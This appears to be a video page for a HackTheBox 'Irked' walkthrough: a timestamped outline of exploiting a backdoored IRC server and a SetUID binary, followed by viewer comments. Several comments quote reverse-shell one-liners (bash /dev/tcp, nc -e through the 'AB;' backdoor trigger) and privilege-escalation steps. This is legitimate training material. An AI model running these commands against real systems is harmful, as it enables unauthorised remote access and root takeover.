HackTheBox - Irked

  • Published 26 Apr 2019
  • The last video was missing about 2 minutes and cut off at 31:35. Sorry, it was an extremely busy week and I didn't get to verify everything was good.
    00:39 - Begin on Recon
    01:39 - Starting a full nmap scan
    04:15 - Discovery of IRC
    04:35 - Manually looking at IRC
    06:00 - Looking at the IRC to understand how to connect to an IRC Server
    07:00 - Pulling the IRC Version and discovering the exploit
    08:50 - Going into the history of the IRC Backdoor
    09:45 - Manually exploiting the IRC Server
    13:10 - Shell returned on the server
    14:30 - Discovery of .backup which gives a steg password
    16:45 - Logging in with djmardov
    21:20 - Discovery of SetUID enabled custom binary, viewuser
    23:25 - Using ltrace to see what the binary does: it executes the file /tmp/listusers
    23:50 - Getting a root shell
    25:50 - Testing exploiting the binary with "who", fails due to no setuid
    27:50 - Looking at the binary within Ghidra

Comments • 51

  • @RobertGallop · 5 years ago · +3

    Always the highlight of my Saturday. Thanks for another solid post!

  • @NullPxl · 5 years ago · +3

    Thanks! Just finished watching the original video so great timing :P

  • @vladimirchudyk995 · 4 years ago

    Awesome breakthrough and explanation!

  • @michaelfisher2821 · 5 years ago · +1

    Thanks for the quality videos IppSec. Really like how clear you are with explaining the tools and methods you use. Just curious though, are you doing the boxes for the first time in your videos? Or are you solving them first, and then making the video?

  • @fatfrumos9292 · 4 years ago · +1

    Hello IppSec, I have been following you for a month and you amaze me every time...
    you know a lot of tools, paths, you are like a wiki in pen testing...
    The question is, are you doing a course somewhere? Are you planning to?
    Cheers
    Nice content, keep it up

  • @jarednorris2592 · 5 years ago · +2

    Thanks for doing beginner boxes as well as the difficult ones, I wonder why they included pass.txt in root?
    Maybe something to look into for further exploration :)

  • @mr.fakeman4718 · 5 years ago · +15

    I'm proud of myself that I know what's happening.
    Too bad I lost some points 'cause this box got retired.

    • @bbuggediffy · 5 years ago · +2

      Me too. I'm a little pissed about that to be honest. It was a fine box and challenge, this one.

  • @bonesseben5682 · 3 years ago · +1

    Glad to see that ippsec is still human and can forget the order of # and ! at a bash file (-; cheers

  • @danialahmed01 · 5 years ago · +2

    Thank you so much

  • @charlesreed6604 · 4 years ago · +2

    Love your videos, you rock! I'm curious too why the file being from 2018 means it is interesting? I ran find / -perm -4000 2>/dev/null to get there, but didn't see why that one stood out versus any of the others. Thanks and keep up the great work!

    • @ippsec · 4 years ago · +1

      This box was retired April 2019 -- Generally boxes retire after 4-6 months, so it being created in 2018 meant it was created around the time the box was released.

  • @DaObvious1 · 5 years ago

    Is there a specific reason you're using ncat instead of nc? I know ncat is the nmap version and that the netcat openbsd version doesn't support the -e option, but was wondering if there was a specific reason to use ncat instead of nc in this case. Maybe I missed something. Just curious. This was my first box ever on HTB and of course, just like you said, I used MSF LOL! The manual way is awesome. Thanks for doing these videos. Keep up the great work!

    • @ippsec · 5 years ago · +4

      Both are the same on Kali I believe, no reason just what my mind went to

  • @Dobendanx · 5 years ago · +3

    Oh so this is how you were supposed to own the user, I got to root first via suid and just read it afterwards

  • @ivartorr1469 · 5 years ago · +1

    At 4:48 when you run nmap -sC -sV -p 8067 10.10.10.117 it returns the results displayed there; however, when I run mine, it takes a while for it to display any information and it doesn't display anything of value or even close to resembling yours. It says "Unable to open connection". However, I am connected to the server and HTB. Any idea as to why that is happening?

  • @TsukiCTF · 5 years ago · +5

    Lol, I love that apple

  • @varunkumar6223 · 5 years ago

    Hello sir, thanks for such informative videos. I have a question: I'm a bit confused about the services running on 139,445. Can you suggest some machine where you exploited them? Thanks once again.

  • @marcozufferli6080 · 4 years ago · +1

    What's the difference between bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 and bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'? Why does the last one work instead of the first?
    I don't understand the motivation for the symbolic link.

  • @redzaizudin6231 · 5 years ago · +1

    ty

  • @wutangdaug · 4 years ago

    Maybe it is a little too late, but for the /usr/bin/viewuser, when you try to exploit that " who" command, I modified like this:
    /bin/bash -p
    then it returned root, I also learned this from you :D

  • @winxlinx8636 · 5 years ago · +1

    At 10:25, what does this command represent: echo "AB; ping -c 1 10.10.143.3" | ncat 10.10.10.117 8067 ?

  • @behnamanisi1 · 4 years ago

    So I did something different... I created a reverse shell and placed it in /tmp/listusers... so when that listusers was run by the DJ account I got a connection back to myself as root..

  • @kab3800 · 4 years ago · +1

    @IppSec at 22:15, how can we copy the binary without using the base64 technique? Can we copy it directly using nc or python? You mentioned that you don't remember the user's password, that's why you're base64 encoding it. Didn't quite get you.

  • @JiyongShinful · 5 years ago · +2

    Love your video as usual. Just one question I wanna drop here.. When I run echo "A; nc -e /bin/bash my IP 4444" | nc 10.10.10.117 8067 I am not able to receive a reverse shell and the only difference between your command and my command is just you using "echo "AB and me using "echo "A. Why would it make such a huge difference in result not being able to grab the shell?

    • @ippsec · 5 years ago · +5

      The backdoor is specifically looking for AB.

    • @JiyongShinful · 5 years ago

      Thanks for your answer Ippsec!

    • @servermadum7297 · 11 months ago

      @JiyongShinful @ippsec why is it specifically looking for the AB?

  • @winxlinx8636 · 5 years ago

    At 12:43, any idea why it is required to upgrade it to a proper tty?

  • @jean-lucforsain9785 · 4 years ago · +1

    Hello IppSec,
    At 12:20, I don't understand what is the difference between "bash -i ...." and "bash -c 'bash -i ....'".
    Why doesn't the reverse shell work for the first command but works for the second one?
    Can you explain this point please ?
    Regards,

    • @sjors3016 · 3 years ago

      Yess, I am also wondering this myself. Not easy to search for this

  • @sid_cysec7323 · 4 years ago

    Now here's the catch: how is the viewuser file in suid interesting? It's not a default file in Debian, I checked. But if we go quickly over how you went there, that some juicy stuff is there in suid and that file is interesting.
    Just want to know the approach.

  • @ZerkerEOD · 5 years ago · +1

    Why do you just use nmap instead of masscan on boxes? I find doing masscan initially finds more ports faster for a specific nmap port scan later.

    • @ippsec · 5 years ago · +2

      Masscan can miss things

    • @ZerkerEOD · 5 years ago

      Awesome, thanks for the reply! Still learning a lot and your videos are my go to if I can't figure something out.

  • @jefferyfan5506 · 4 years ago

    viewuser is running sh /tmp/listusers, so what I did is just add a reverse shell to it and rooted. echo "reverseshell" > /tmp/listusers; chmod +x /tmp/listusers; viewuser. Because I think the system clears /tmp after a period of idk how long.

  • @tejasanerao1842 · 3 years ago

    24:02 And I thought I was the only one always confused about it😂

  • @sleexox · 2 years ago

    Anyone knows what is the AB for in echo "AB; ?

  • @noyannyn891 · 5 years ago

    why can't I view the website and how fast do you scan nmap?

  • @ashutoshpanda4336 · 5 years ago · +12

    Can you please make separate videos on RE .... I'm really weak on that... Please make videos

    • @mr.fakeman4718 · 5 years ago · +2

      +1

    • @jigerjain · 5 years ago · +2

      You could follow LiveOverflow; he has already made some really good videos starting from basic tutorials on RE. Ippsec is great with HTB no doubt!

    • @ashutoshpanda4336 · 5 years ago · +2

      @jigerjain yeah I was going through the binary explanation series .... No doubt for ippsec.... He is awesome .....

  • @wearegettingdumber...2263 · 5 years ago

    How are you entering copy mode and selecting the text and then saving to buffer? Please point me to the right place because the documentation is confusing as hell for us mortals..

    • @artemisheller4701 · 5 years ago · +1

      You mean in tmux? That would be 'C-b [' (or 'C-a [' in case you still have the default) to enter copy mode, then you move to the text you want, 'v' to start selecting, and 'y' to yank!

  • @FastMasuk · 5 years ago

    The Bash interpreter drops SUID permissions. Since the script is owned by root, using #!/bin/dash should get a root shell with "who". I didn't try this box so I could be wrong; if you try it afterwards let me know if it worked.

  • @utkarshagrawal851 · 5 years ago

    I also use Netcat but I never use that type of functionality that you use. I mean, how does it work when you type User Pass in the netcat session? What is this functionality called in netcat? Anyone?

  • @stolzoffd9761 · 5 years ago

    Why is Ghidra better than Cutter?

    • @jarednorris2592 · 5 years ago

      Cutter is just a UI for radare2.
      Don't get me wrong, I love radare2 and use it 90% of the time in its CLI version.
      But the devs of Cutter even said it was purpose built to be a beginner's intro to radare2 and not a full fledged tool to compete with binja, IDE, Ghidra, etc.

  • @striple765 · 5 years ago

    First